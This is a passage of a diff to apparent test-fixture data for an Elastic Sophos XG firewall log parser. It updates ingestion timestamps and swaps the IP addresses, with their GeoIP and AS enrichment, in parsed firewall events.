"device=\"SFW\" date=2020-05-18 time=14:38:39 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010102600002 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name=\"\" user_gp=\"\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=24:01:c7:07:2b:a2 src_ip=172.17.35.113 src_country_code=\"\" dst_ip=172.20.4.52 dst_country_code=\"\" protocol=\"TCP\" src_port=53287 dst_port=4980 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715413100Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:39 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010102600002 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name=\"\" user_gp=\"\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=24:01:c7:07:2b:a2 src_ip=175.16.199.1 src_country_code=\"\" dst_ip=175.16.199.1 dst_country_code=\"\" protocol=\"TCP\" src_port=53287 dst_port=4980 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010102600002", "kind": "event", "start": "2020-05-18T14:38:39.000Z", @@ -5253,7 +5422,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566416700Z", + "ingested": "2021-12-09T13:44:55.715419100Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:40 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010102600002 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name=\"elastic@user.local\" user_gp=\"elastic.group.local\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"tun0\" out_interface=\"Port1\" src_mac=\"\" src_ip=10.82.234.6 src_country_code=\"\" dst_ip=192.168.0.1 dst_country_code=\"\" protocol=\"TCP\" src_port=60102 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010102600002", "kind": "event", @@ -5278,7 +5447,7 @@ "port": 18, "bytes": 0, "packets": 0, - "ip": "185.7.209.207" + "ip": "175.16.199.1" }, "log": { "level": "informational" @@ -5288,23 +5457,25 @@ "port": 0 }, "geo": { - "continent_name": "Europe", - "country_name": "Germany", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 9.491, - "lat": 51.2993 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "DE" + "country_iso_code": "CN" }, "as": { - "number": 42652, + "number": 4837, "organization": { - "name": "inexio Informationstechnologie und Telekommunikation Gmbh" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 18, "bytes": 0, - "ip": "185.7.209.207", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -5316,26 +5487,25 @@ "port": 0 }, "geo": { - "continent_name": "Europe", - "region_iso_code": "PL-14", - "city_name": "Warsaw", - "country_iso_code": "PL", - "country_name": "Poland", - "region_name": "Mazovia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 21.0, - "lat": 52.25 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 16276, + "number": 4837, "organization": { - "name": "OVH SAS" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 55039, "bytes": 0, - "ip": "51.77.56.9", + "ip": "175.16.199.1", "mac": "c4:f7:d5:b5:47:f4", "packets": 0 }, @@ -5367,8 +5537,7 @@ "defaulttest.local" ], "ip": [ - "51.77.56.9", - "185.7.209.207" + "175.16.199.1" ] }, "sophos": { @@ -5401,13 +5570,13 @@ "bytes": 0, "mac": "c4:f7:d5:b5:47:f4", "packets": 0, - "ip": "51.77.56.9" + "ip": "175.16.199.1" }, "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566422Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:41 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010302602002 log_type=\"Firewall\" log_component=\"Appliance Access\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2\" out_interface=\"\" src_mac=c4:f7:d5:b5:47:f4 src_ip=51.77.56.9 src_country_code=\"\" dst_ip=185.7.209.207 dst_country_code=\"\" protocol=\"TCP\" src_port=55039 dst_port=18 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715424900Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:41 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010302602002 log_type=\"Firewall\" log_component=\"Appliance Access\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2\" out_interface=\"\" src_mac=c4:f7:d5:b5:47:f4 src_ip=175.16.199.1 src_country_code=\"\" dst_ip=175.16.199.1 dst_country_code=\"\" protocol=\"TCP\" src_port=55039 dst_port=18 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010302602002", "kind": "event", "start": "2020-05-18T14:38:41.000Z", @@ -5453,9 +5622,26 @@ "nat": { "port": 0 }, + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 51826, "bytes": 0, - "ip": "172.17.35.101", + "ip": "175.16.199.1", "user": { "name": "elastic@user.local", "group": { @@ -5501,7 +5687,7 @@ "testhost.local" ], "ip": [ - "172.17.35.101", + "175.16.199.1", "192.168.5.11" ] }, @@ -5535,13 +5721,13 @@ "bytes": 0, "mac": "24:01:c7:07:2b:a2", "packets": 0, - "ip": "172.17.35.101" + "ip": "175.16.199.1" }, "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566427400Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:42 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010102600002 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name=\"elastic@user.local\" user_gp=\"elastic.group.local\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=24:01:c7:07:2b:a2 src_ip=172.17.35.101 src_country_code=\"\" dst_ip=192.168.5.11 dst_country_code=\"\" protocol=\"TCP\" src_port=51826 dst_port=1109 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715430600Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:42 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010102600002 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name=\"elastic@user.local\" user_gp=\"elastic.group.local\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=24:01:c7:07:2b:a2 src_ip=175.16.199.1 src_country_code=\"\" dst_ip=192.168.5.11 dst_country_code=\"\" protocol=\"TCP\" src_port=51826 dst_port=1109 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010102600002", "kind": "event", "start": "2020-05-18T14:38:42.000Z", @@ -5587,11 +5773,28 @@ "nat": { "port": 0 }, + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 3389, "bytes": 0, + "ip": "175.16.199.1", "mac": "34:db:fd:83:d8:09", - "packets": 0, - "ip": "172.16.36.105" + "packets": 0 }, "tags": [ "preserve_original_event" @@ -5621,7 +5824,7 @@ "defaulttest.local" ], "ip": [ - "172.16.36.105", + "175.16.199.1", "10.84.234.14" ] }, @@ -5655,13 +5858,13 @@ "bytes": 0, "mac": "34:db:fd:83:d8:09", "packets": 0, - "ip": "172.16.36.105" + "ip": "175.16.199.1" }, "event": { "duration": 0, "severity": 4, - "ingested": "2021-06-30T11:19:55.566431100Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:43 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010402403001 log_type=\"Firewall\" log_component=\"DoS Attack\" log_subtype=\"Denied\" status=\"Deny\" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"\" src_mac=34:db:fd:83:d8:09 src_ip=172.16.36.105 src_country_code=\"\" dst_ip=10.84.234.14 dst_country_code=\"\" protocol=\"UDP\" src_port=3389 dst_port=64465 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715436600Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:43 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010402403001 log_type=\"Firewall\" log_component=\"DoS Attack\" log_subtype=\"Denied\" status=\"Deny\" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"\" src_mac=34:db:fd:83:d8:09 src_ip=175.16.199.1 src_country_code=\"\" dst_ip=10.84.234.14 dst_country_code=\"\" protocol=\"UDP\" src_port=3389 dst_port=64465 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010402403001", "kind": "alert", "start": "2020-05-18T14:38:43.000Z", @@ -5779,7 +5982,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566435Z", + "ingested": "2021-12-09T13:44:55.715442500Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:44 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=012802605201 log_type=\"Firewall\" log_component=\"SSL VPN\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"tun0\" out_interface=\"\" src_mac=\"\" src_ip=10.82.234.9 src_country_code=\"\" dst_ip=10.82.234.11 dst_country_code=\"\" protocol=\"TCP\" src_port=58331 dst_port=56267 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "012802605201", "kind": "event", @@ -5804,7 +6007,7 @@ "port": 443, "bytes": 0, "packets": 0, - "ip": "172.16.34.50" + "ip": "175.16.199.1" }, "log": { "level": "informational" @@ -5813,10 +6016,27 @@ "nat": { "port": 0 }, + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 443, "bytes": 0, - "packets": 0, - "ip": "172.16.34.50" + "ip": "175.16.199.1", + "packets": 0 }, "rule": { "ruleset": "2", @@ -5878,7 +6098,7 @@ ], "ip": [ "10.84.234.7", - "172.16.34.50" + "175.16.199.1" ] }, "sophos": { @@ -5920,8 +6140,8 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566438500Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:45 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=0 fw_rule_id=61 policy_type=2 user_name=\"elastic@user.local\" user_gp=\"elastic.group.local\" iap=0 ips_policy_id=11 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"ipsec0\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=10.84.234.7 src_country_code=R1 dst_ip=172.16.34.50 dst_country_code=R1 protocol=\"TCP\" src_port=58543 dst_port=443 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"VPN\" srczone=\"VPN\" dstzonetype=\"VPN\" dstzone=\"VPN\" dir_disp=\"\" connevent=\"Start\" connid=\"1615935064\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715448300Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:45 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=0 fw_rule_id=61 policy_type=2 user_name=\"elastic@user.local\" user_gp=\"elastic.group.local\" iap=0 ips_policy_id=11 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"ipsec0\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=10.84.234.7 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"TCP\" src_port=58543 dst_port=443 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"VPN\" srczone=\"VPN\" dstzonetype=\"VPN\" dstzone=\"VPN\" dir_disp=\"\" connevent=\"Start\" connid=\"1615935064\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010101600001", "kind": "event", "start": "2020-05-18T14:38:45.000Z", @@ -5945,7 +6165,7 @@ }, "bytes": 0, "packets": 0, - "ip": "172.17.32.19" + "ip": "175.16.199.1" }, "log": { "level": "notification" @@ -5954,9 +6174,26 @@ "nat": { "port": 0 }, + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "bytes": 0, "packets": 0, - "ip": "172.17.32.19" + "ip": "175.16.199.1" }, "rule": { "ruleset": "1", @@ -6000,7 +6237,7 @@ ], "ip": [ "192.168.1.254", - "172.17.32.19" + "175.16.199.1" ] }, "sophos": { @@ -6041,8 +6278,8 @@ "event": { "duration": 0, "severity": 5, - "ingested": "2021-06-30T11:19:55.566443600Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:45 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=018201500005 log_type=\"Firewall\" log_component=\"ICMP ERROR MESSAGE\" log_subtype=\"Allowed\" status=\"Allow\" priority=Notice duration=0 fw_rule_id=60 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=17 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"\" src_mac=34:db:fd:83:d8:09 src_ip=192.168.1.254 src_country_code=\"\" dst_ip=172.17.32.19 dst_country_code=\"\" protocol=\"ICMP\" icmp_type=3 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connevent=\"Interim\" connid=\"2685668438\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715454200Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:45 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=018201500005 log_type=\"Firewall\" log_component=\"ICMP ERROR MESSAGE\" log_subtype=\"Allowed\" status=\"Allow\" priority=Notice duration=0 fw_rule_id=60 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=17 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"\" src_mac=34:db:fd:83:d8:09 src_ip=192.168.1.254 src_country_code=\"\" dst_ip=175.16.199.1 dst_country_code=\"\" protocol=\"ICMP\" icmp_type=3 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connevent=\"Interim\" connid=\"2685668438\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "018201500005", "kind": "event", "start": "2020-05-18T14:38:45.000Z", @@ -6064,16 +6301,33 @@ "port": 88, "bytes": 1732, "packets": 6, - "ip": "172.16.34.10" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 88, "bytes": 1732, "packets": 6, - "ip": "172.16.34.10" + "ip": "175.16.199.1" }, "rule": { "ruleset": "1", @@ -6083,11 +6337,28 @@ "nat": { "port": 0 }, + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 61925, "bytes": 1802, + "ip": "175.16.199.1", "mac": "00:00:00:00:00:00", - "packets": 6, - "ip": "172.17.35.119" + "packets": 6 }, "tags": [ "preserve_original_event" @@ -6123,8 +6394,7 @@ "defaulttest.local" ], "ip": [ - "172.17.35.119", - "172.16.34.10" + "175.16.199.1" ] }, "sophos": { @@ -6161,13 +6431,13 @@ "bytes": 1802, "mac": "00:00:00:00:00:00", "packets": 6, - "ip": "172.17.35.119" + "ip": "175.16.199.1" }, "event": { "duration": 10000000000, "severity": 6, - "ingested": "2021-06-30T11:19:55.566448800Z", - "original": "device=\"SFW\" date=2020-06-05 time=12:38:53 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=10 fw_rule_id=60 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=17 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"ipsec0\" out_interface=\"Port1\" src_mac=00:00:00:00:00:00 src_ip=172.17.35.119 src_country_code=R1 dst_ip=172.16.34.10 dst_country_code=R1 protocol=\"TCP\" src_port=61925 dst_port=88 sent_pkts=6 recv_pkts=6 sent_bytes=1802 recv_bytes=1732 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0srczonetype=\"VPN\" srczone=\"VPN\" dstzonetype=\"LAN\" dstzone=\"LAN\" dir_disp=\"\" connevent=\"Stop\" connid=\"1617126256\" vconnid=\"\" hb_health=\"NoHeartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0\"", + "ingested": "2021-12-09T13:44:55.715460200Z", + "original": "device=\"SFW\" date=2020-06-05 time=12:38:53 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=10 fw_rule_id=60 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=17 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"ipsec0\" out_interface=\"Port1\" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"TCP\" src_port=61925 dst_port=88 sent_pkts=6 recv_pkts=6 sent_bytes=1802 recv_bytes=1732 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0srczonetype=\"VPN\" srczone=\"VPN\" dstzonetype=\"LAN\" dstzone=\"LAN\" dir_disp=\"\" connevent=\"Stop\" connid=\"1617126256\" vconnid=\"\" hb_health=\"NoHeartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0\"", "code": "010101600001", "kind": "event", "start": "2020-06-05T12:38:53.000Z", @@ -6192,7 +6462,7 @@ "port": 0, "bytes": 0, "packets": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "log": { "level": "informational" @@ -6202,23 +6472,25 @@ "port": 0 }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 0, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -6258,7 +6530,7 @@ ], "ip": [ "10.198.32.19", - "8.8.8.8" + "175.16.199.1" ] }, "sophos": { @@ -6295,8 +6567,8 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566455100Z", - "original": "device=\"SFW\" date=2018-05-30 time=13:26:37 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010202601001 log_type=\"Firewall\" log_component=\"Invalid Traffic\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol=\"UDP\" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"Invalid UDP destination.\" appresolvedby=\" Signature\"", + "ingested": "2021-12-09T13:44:55.715466Z", + "original": "device=\"SFW\" date=2018-05-30 time=13:26:37 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010202601001 log_type=\"Firewall\" log_component=\"Invalid Traffic\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol=\"UDP\" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"Invalid UDP destination.\" appresolvedby=\" Signature\"", "code": "010202601001", "kind": "event", "start": "2018-05-30T13:26:37.000Z", @@ -6406,7 +6678,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566462300Z", + "ingested": "2021-12-09T13:44:55.715471900Z", "original": "device=\"SFW\" date=2018-06-04 time=17:20:24 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=011402601301 log_type=\"Firewall\" log_component=\"Fragmented Traffic\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=0.0.0.0 src_country_code= dst_ip=0.0.0.0 dst_country_code= protocol=\"0\" src_port=0 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", "code": "011402601301", "kind": "event", @@ -6525,7 +6797,7 @@ "event": { "duration": 0, 